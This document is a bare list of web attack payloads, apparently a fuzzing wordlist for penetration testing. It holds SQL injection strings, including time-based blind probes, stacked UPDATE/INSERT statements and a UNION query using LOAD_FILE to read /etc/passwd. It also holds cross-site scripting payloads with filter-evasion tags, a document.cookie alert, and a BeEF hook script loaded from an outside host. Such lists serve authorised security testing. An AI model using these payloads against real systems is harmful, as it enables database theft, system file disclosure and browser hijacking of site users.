1 OR 1=1 
' OR 1=1 --
" OR 1=1 -- 
' OR 1=1; 
1 AND 1=1 
x' OR '1'='1 
' OR 1 in (@@version)--
' UNION (select @@version) --
1 OR sleep(___TIME___)# 
' OR sleep(___TIME___)# 
" OR sleep(___TIME___)# 
1 or benchmark(10000000,MD5(1))# 
' or benchmark(10000000,MD5(1))# 
" or benchmark(10000000,MD5(1))# 
;waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:__TIME__'--
';waitfor delay '0:0:__TIME__'--
";waitfor delay '0:0:__TIME__'--
OR 1=1 ORDER BY table_name DESC 
x'; UPDATE table SET value WHERE user='x 
1'; INSERT INTO table VALUES(‘value’,‘value’); --
101 AND (SELECT ASCII(SUBSTR(name,1,1)) FROM table WHERE foo=n)$ --
' union select null,LOAD_FILE('../../../../../etc/passwd'),null,null,null --
<scr<script>ipt>alert(xss)</scr</script>ipt> 
<script><script>alert(1)</script>
<script language="javascript">window.location.href = "beeftrap.html" ; </script> 
<script src="http://beefhook.js"></script> 
<ScRiPt>alert(1)</ScRiPt> 
%00<script>alert(1)</script> 
<img onerror=alert(1) src=a>
<script>alert('xss');</script>
'><script>alert(document.cookie)</script>
aaaa"><script>alert(1)</script>